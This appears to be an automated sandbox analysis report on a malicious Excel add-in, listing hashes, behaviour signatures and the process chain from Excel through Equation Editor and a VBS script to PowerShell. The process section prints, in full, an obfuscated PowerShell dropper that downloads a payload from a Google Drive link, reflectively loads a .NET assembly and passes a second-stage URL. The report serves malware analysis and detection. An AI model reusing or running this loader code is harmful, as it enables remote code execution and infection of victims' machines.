Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
19-10-2024 02:24
General
-
Target
c45d31e44d57ed25927e102efcfae85dd155f2496624c3958bdd4076d4e0b386.xlam
-
Size
597KB
-
MD5
b084fdb4d0c9b94ab31e3a762a8ceae9
-
SHA1
40118c7bde4f52645b341ee5dacca239eeb482ef
-
SHA256
c45d31e44d57ed25927e102efcfae85dd155f2496624c3958bdd4076d4e0b386
-
SHA512
c7a0b4175be14c6146a5016bcc733096b68acc1ec1a0c9078e3d8038ca3cb025cbff79ef5a85899a0e1b91c00b3e77086f8af1bf3da0f16030f172ce08dbeb17
-
SSDEEP
12288:YYoYZa3XGB29qpzJjEsC/KW2ZF4wtho8mDYEX4BLKLQ:PRw32XzJjHC/EHtho8mD1X41KM
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://drive.google.com/uc?export=download&id=17kQITFJZ1tqdqTVyc8JyKCRsAb083F4G
exe.dropper
https://drive.google.com/uc?export=download&id=17kQITFJZ1tqdqTVyc8JyKCRsAb083F4G
Signatures
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\c45d31e44d57ed25927e102efcfae85dd155f2496624c3958bdd4076d4e0b386.xlam1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\miraclefridaymanager.vbs"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWVYICgoJ21CUScrJ2ltYWdlVXJsID0gQnJ0aHR0cHM6JysnLy9kcml2ZS5nb29nbGUuY28nKydtL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xN2tRSVRGSloxdHFkcVRWeWM4SnlLQ1JzQWIwODNGNEcgQnJ0O21CUXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzJysndGVtLk5ldC5XZScrJ2JDbGllbnQ7bUJRaW1hZ2VCeXRlcyA9IG1CUXdlYkNsaWVudC5Eb3dubG9hZERhdGEobUJRaW1hZ2UnKydVcmwpO21CUWltYWdlVGV4dCA9IFtTeXN0ZScrJ20uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG1CUWltYWdlQnl0ZXMpO21CUXN0YXJ0RmxhZyA9IEJydDw8QkFTRTY0X1NUQVJUPj5CcnQ7bUJRZW5kRmxhZyA9IEJydDw8QkFTRTY0X0VORD4+QnJ0O21CUXN0YXJ0SW5kZXggPSBtQlFpbWFnZVRleHQuSW5kZXhPZihtQlFzdGFydEZsYWcpO21CUWVuZEluZGV4ID0gbUJRaW1hZ2VUZXh0LkluZGV4T2YobUJRZW5kRmxhZyk7bUJRc3RhJysncnRJbmRleCAtZ2UgMCAtYW5kIG1CUWVuZEluZGV4JysnIC1ndCBtQlFzdGFydEluZGV4O21CUXN0YXJ0SW5kZXgnKycgKz0gbUJRc3RhcnRGbGFnLkxlbmd0aDttQlFiYXNlNjRMZW5ndGggPSBtQlFlbmRJbmRleCAtIG1CUXN0YXJ0SW5kZXg7bUJRYmFzZScrJzY0Q29tbWFuZCA9IG1CUWltYWdlVGV4dC5TdWJzdHJpbmcobUJRc3RhcnRJbmRleCwgbUJRYmFzZTY0TGVuZ3RoKTttQlFiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChtQlFiJysnYXNlNjRDb21tYW5kLlRvQ2hhckFyJysncmF5KCkgc0l6IEZvckVhJysnY2gtT2JqJysnZWN0IHsgbUJRXyB9KVstMS4uLShtQicrJ1FiYXNlNicrJzRDJysnb21tYW5kLkxlbmd0aCldO21CUWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcobUJRYmFzZTY0UmUnKyd2ZXJzZWQpO21CUWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzJysnc2VtYmx5XTo6TG9hZChtQlFjb21tYW5kQnl0ZXMpO21CUXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoQnJ0VkFJQnJ0KTttQlF2YWlNZXRob2QuSW52b2tlKG1CUW51bGwsIEAoQnJ0dHh0LmJiYmJiYmJiYmJiZXdtYWRhbS9ncm8uc25ka2N1ZC5yZWdhbmFtbGEnKydjb2x5YWRpcmYvLycrJzpwdHRoQnJ0LCBCcnRkZXNhdGl2YWRvQnJ0LCBCcnRkZXNhdGl2YWRvQnJ0LCBCcnRkZXNhdGl2YWRvQnJ0LCBCcnRBZGRJJysnblByb2Nlc3MzMkJydCwgQnJ0ZGVzYXRpdmFkb0JydCwgQnJ0ZGVzYXRpdmFkb0JydCknKycpOycpLlJFUExhY2UoJ21CUScsW1NUUmluR11bY0hBcl0zNikuUkVQTGFjZSgoW2NIQXJdNjYrW2NIQXJdMTE0K1tjSEFyXTExNiksW1NUUmluR11bY0hBcl0zOSkuUkVQTGFjZSgoW2NIQXJdMTE1K1tjSEFyXTczK1tjSEFyXTEyMiksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "IeX (('mBQ'+'imageUrl = Brthttps:'+'//drive.google.co'+'m/uc?export=download&id=17kQITFJZ1tqdqTVyc8JyKCRsAb083F4G Brt;mBQwebClient = New-Object Sys'+'tem.Net.We'+'bClient;mBQimageBytes = mBQwebClient.DownloadData(mBQimage'+'Url);mBQimageText = [Syste'+'m.Text.Encoding]::UTF8.GetString(mBQimageBytes);mBQstartFlag = Brt<<BASE64_START>>Brt;mBQendFlag = Brt<<BASE64_END>>Brt;mBQstartIndex = mBQimageText.IndexOf(mBQstartFlag);mBQendIndex = mBQimageText.IndexOf(mBQendFlag);mBQsta'+'rtIndex -ge 0 -and mBQendIndex'+' -gt mBQstartIndex;mBQstartIndex'+' += mBQstartFlag.Length;mBQbase64Length = mBQendIndex - mBQstartIndex;mBQbase'+'64Command = mBQimageText.Substring(mBQstartIndex, mBQbase64Length);mBQbase64Reversed = -join (mBQb'+'ase64Command.ToCharAr'+'ray() sIz ForEa'+'ch-Obj'+'ect { mBQ_ })[-1..-(mB'+'Qbase6'+'4C'+'ommand.Length)];mBQcommandBytes = [System.Convert]::FromBase64String(mBQbase64Re'+'versed);mBQloadedAssembly = [System.Reflection.As'+'sembly]::Load(mBQcommandBytes);mBQvaiMethod = [dnlib.IO.Home].GetMethod(BrtVAIBrt);mBQvaiMethod.Invoke(mBQnull, @(Brttxt.bbbbbbbbbbbewmadam/gro.sndkcud.reganamla'+'colyadirf//'+':ptthBrt, BrtdesativadoBrt, BrtdesativadoBrt, BrtdesativadoBrt, BrtAddI'+'nProcess32Brt, BrtdesativadoBrt, BrtdesativadoBrt)'+');').REPLace('mBQ',[STRinG][cHAr]36).REPLace(([cHAr]66+[cHAr]114+[cHAr]116),[STRinG][cHAr]39).REPLace(([cHAr]115+[cHAr]73+[cHAr]122),'|'))"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD55e13f257c7c69e31a0d353ecf53a7d23
SHA1228012e1079d57566e7d3e854a2a92ca9860df9c
SHA25655b872e307d1afa82d346227e4009b931bd3832d1c0bcce3e58ea0004c99de2f
SHA51248f229ba7a276e6f9d964a8f209f6bea0b570a456a38894f83523b177014f206c179379053541f730c3821cf8d13a09d5078bfb87689bba7fd6eb038c80cacf3
-
Filesize
192KB
MD51e74a1e9b214a5e7de05d71bc03849e8
SHA14313868bae215573da78b467d5a7390a6a86117c
SHA25601eed58d2c0ff62733000b76b6ab80124480f5af9195a33c3157c60df2f3cd80
SHA5123fcb390d7bae3e6d0ae3e0cc4d50825a27872930633747bbcc07e75ccbb2d392336fe8cb6267ca2bbf05b88002249b7d41a9eb9f8559d719058fda18d90ef4af
-
Filesize
64KB
-
Filesize
44KB
-
Filesize
44KB